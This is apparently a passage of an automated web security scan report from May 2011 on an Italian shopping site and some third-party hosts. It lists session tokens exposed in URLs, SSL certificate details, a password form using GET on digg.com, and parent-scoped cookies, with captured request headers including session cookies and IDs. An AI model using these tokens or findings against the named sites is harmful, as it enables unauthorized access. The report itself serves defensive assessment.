<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH245868"><img src="/sh4/img/ico_software.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH245680"><img src="/sh4/img/ico_corsi.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH245976"><img src="/sh4/img/ico_serviziOnLine.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246087709"><img src="/sh4/img/ico_alinari.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246096938"><img src="/sh4/img/ico_dvd.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=cat790003"><img src="/sh4/img/ico_regalbox.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=cat790019"><img src="/sh4/img/ico_bottiglie.gif" alt="" title=""/>
...[SNIP]...
<li>
       <a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=Shopping24Collaterals"><img src="/ProductRelated/small_images/ico_collana.gif" alt="stellina" style="margin-right:5px;"/>
...[SNIP]...
<li>
       <a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=cat850017"><img src="/ProductRelated/small_images/ico_italia.jpg" alt="stellina" style="margin-right:5px;"/>
...[SNIP]...
<li>
       <a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=cat860002"><img src="/ProductRelated/small_images/servizi_cittadino.gif" alt="stellina" style="margin-right:5px;"/>
...[SNIP]...
<li><a href="/sh4/catalog/help/sh24-help.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09">Sei nuovo su shopping24?</a>
...[SNIP]...
<li><a href="/sh4/catalog/help/sh24-help-consegna.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09">Distribuzione e resi</a>
...[SNIP]...
<li><a href="/sh4/catalog/help/sh24-help-pagamenti.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09">Pagamenti</a>
...[SNIP]...
<li><a href="/sh4/catalog/categories/siteMap.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09">Sitemap</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245309" name=""><img border="0" width='70' src='/ProductRelated/small_images/D01.gif' alt="Il Sole 24 ORE"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245309" class="title" name="">Il Sole 24 ORE</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245297" name=""><img border="0" width='70' src='/ProductRelated/small_images/P02.jpg' alt="Guida Pratica Fiscale"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245297" class="title" name="">Guida Pratica Fiscale</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245309"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245297"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090087" name=""><img border="0" width='70' src='/ProductRelated/small_images/GPP06.jpg' alt="Applicando"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090087" class="title" name="">Applicando</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090086" name=""><img border="0" width='70' src='/ProductRelated/small_images/gpp04.jpg' alt="Mark Up"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090086" class="title" name="">Mark Up</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090087"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090086"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH241673427" name=""><img border="0" width='70' src='/ProductRelated/small_images/P18.jpg' alt="Ambiente&amp;Sicurezza"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH241673427" class="title" name="">Ambiente&Sicurezza</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245303" name=""><img border="0" width='70' src='/ProductRelated/small_images/P12.jpg' alt="Guida al Diritto"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245303" class="title" name="">Guida al Diritto</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH241673427"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245303"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH24622329" name=""><img border="0" width='70' src='/ProductRelated/small_images/P102.jpg' alt="L&#39;Impresa"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH24622329" class="title" name="">L'Impresa</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245619825" name=""><img border="0" width='70' src='/ProductRelated/small_images/P105.jpg' alt="English24"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245619825" class="title" name="">English24</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH24622329"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245619825"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245866781" name=""><img border="0" width='70' src='/ProductRelated/small_images/P107.gif' alt="I Viaggi del Sole"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245866781" class="title" name="">I Viaggi del Sole</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246093926" name=""><img border="0" width='70' src='/ProductRelated/big_images/gpp25.jpeg' alt="Energia24"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246093926" class="title" name="">Energia24</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245866781"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246093926"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
</p>
       <a href="/sh4/catalog/categories/allOfferte.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246140">Tutte le offerte</a>
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246093926" name="&amp;lid=gpp25&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/big_images/gpp25.jpeg' alt="Energia24"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246093926" class="title" name="&amp;lid=gpp25&amp;lpos=offerte">Energia24</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246093926"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090084" name="&amp;lid=eda01&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/eda01.jpg' alt="Terra e vita"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090084" class="title" name="&amp;lid=eda01&amp;lpos=offerte">Terra e vita</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090084"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245309" name="&amp;lid=D01&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/D01.gif' alt="Il Sole 24 ORE"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245309" class="title" name="&amp;lid=D01&amp;lpos=offerte">Il Sole 24 ORE</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH245309"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH24622329" name="&amp;lid=P102&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/P102.jpg' alt="L&#39;Impresa"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH24622329" class="title" name="&amp;lid=P102&amp;lpos=offerte">L'Impresa</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH24622329"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090102" name="&amp;lid=eda02&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/eda02.jpg' alt="Informatore Zootecnico"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090102" class="title" name="&amp;lid=eda02&amp;lpos=offerte">Informatore Zootecnico</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090102"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090104" name="&amp;lid=eda04&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/eda04.jpg' alt="Agricommercio e Garden Center"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090104" class="title" name="&amp;lid=eda04&amp;lpos=offerte">Agricommercio e Garden Center</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090104"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090106" name="&amp;lid=eda06&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/eda06.jpg' alt="Il Contoterzista"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090106" class="title" name="&amp;lid=eda06&amp;lpos=offerte">Il Contoterzista</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090106"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...
<div class='prod-img'>
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090110" name="&amp;lid=eda10&amp;lpos=offerte"><img border="0" width='70' src='/ProductRelated/small_images/eda10.jpg' alt="Macchine e Motori Agricoli"/>
...[SNIP]...
<div class="prod-text">
<a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090110" class="title" name="&amp;lid=eda10&amp;lpos=offerte">Macchine e Motori Agricoli</a>
...[SNIP]...
</div>
       <a href="/sh4/catalog/Product.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?PRODID=SH246090110"><img title="Vai a scheda" src="/sh4/img/button-scheda-small.gif" alt="Scheda">
...[SNIP]...

11.8. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/order/statoOrdine.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /sh4/catalog/order/statoOrdine.jsp;jsessionid=53628C5A5A5C18CA15C1BF2309D1783D HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp?CATID=SH246140
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; SC_LINKS_NW=%5B%5BB%5D%5D; JSESSIONID=53628C5A5A5C18CA15C1BF2309D1783D; ATG_SESSION_ID=53628C5A5A5C18CA15C1BF2309D1783D; s_cc=true; __utmz=30117245.1304393428.1.1.utmcsr=banchedati.ilsole24ore.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=30117245.1497251666.1304393428.1304393428.1304393428.1; __utmc=30117245; __utmb=30117245.1.10.1304393428; c=undefinedwww.banchedati.ilsole24ore.comwww.banchedati.ilsole24ore.com; s_nr=1304393455616-New; SC_LINKS_SH=S24%3Aprodotti%3APeriodici%3Ahome%5E%5E%5E%5ES24%3Aprodotti%3APeriodici%3Ahome%20%7C%20no%20%26lid%5E%5E; s_sq=s24oshoppreprod%3D%2526pid%253DS24%25253Aprodotti%25253APeriodici%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp%25253Bjsessionid%25253D53628C5A5A5C18CA1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:34:24 GMT
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 20436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Stato ordine</t
...[SNIP]...

12. SSL certificate  previous  next
There are 9 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



12.1. https://ads.bluelithium.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://ads.bluelithium.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  ad.yieldmanager.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Tue Dec 22 00:37:18 CST 2009
Valid to:  Sat Feb 21 08:00:37 CST 2015

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

12.2. https://feedback.live.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://feedback.live.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  feedback.office.microsoft.com
Issued by:  Microsoft Secure Server Authority
Valid from:  Tue Oct 12 14:57:06 CDT 2010
Valid to:  Thu Oct 11 14:57:06 CDT 2012

Certificate chain #1

Issued to:  CN=Microsoft Secure Server Authority,DC=redmond,DC=corp,DC=microsoft,DC=com
Issued by:  CN=Microsoft Internet Authority
Valid from:  Wed May 19 17:13:30 CDT 2010
Valid to:  Mon May 19 17:23:30 CDT 2014

Certificate chain #2

Issued to:  CN=Microsoft Internet Authority
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Apr 14 13:12:26 CDT 2010
Valid to:  Sat Apr 14 13:12:14 CDT 2018

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

Certificate chain #4

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

12.3. https://areaclienti187.telecomitalia.it/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://areaclienti187.telecomitalia.it
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  areaclienti187.telecomitalia.it
Issued by:  I.T. Telecom Global CA
Valid from:  Wed Nov 10 08:38:25 CST 2010
Valid to:  Thu Nov 10 08:38:25 CST 2011

Certificate chain #1

Issued to:  I.T. Telecom Global CA
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Dec 15 14:32:00 CST 2004
Valid to:  Mon Dec 15 17:59:00 CST 2014

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

12.4. https://eprocurement.eni.it/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://eprocurement.eni.it
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  eprocurement.eni.it
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Dec 06 18:00:00 CST 2010
Valid to:  Wed Dec 07 17:59:59 CST 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

12.5. https://seal.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seal.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  seal.verisign.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Tue Jul 06 19:00:00 CDT 2010
Valid to:  Sun Jul 06 18:59:59 CDT 2014

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

12.6. https://secure.mightyblue.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mightyblue.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.mightyblue.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Wed Nov 10 06:41:33 CST 2010
Valid to:  Wed Dec 12 21:44:19 CST 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

12.7. https://ui.zanox-affiliate.de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ui.zanox-affiliate.de
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  ui.zanox-affiliate.de
Issued by:  Thawte Premium Server CA
Valid from:  Fri Sep 25 07:35:26 CDT 2009
Valid to:  Sat Oct 01 04:09:30 CDT 2011

Certificate chain #1

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

12.8. https://www.eni.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.eni.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  WWW.ENI.COM
Issued by:  Actalis Server Authentication CA
Valid from:  Mon Oct 18 09:28:31 CDT 2010
Valid to:  Tue Oct 18 09:28:29 CDT 2011

Certificate chain #1

Issued to:  Actalis Server Authentication CA
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Apr 04 09:15:14 CDT 2007
Valid to:  Fri Apr 04 09:14:20 CDT 2014

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

12.9. https://www.webank.it/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.webank.it
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.webank.it
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Thu Jul 01 19:00:00 CDT 2010
Valid to:  Sat Jul 02 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Tue, 03-May-2011 22:24:04 GMT; path=/; domain=digg.com
Set-Cookie: d=a6c9fed1b0af625d597fc8f28c424ca9628041e70e1e569b66b06472a71d7e23; expires=Sun, 02-May-2021 08:31:44 GMT; path=/; domain=.digg.com
X-Digg-Time: D=59942 10.2.129.78
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8170

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

14. Cookie scoped to parent domain  previous  next
There are 70 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


14.1. http://rainbow.mythings.com/pix.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://rainbow.mythings.com
Path:   /pix.aspx
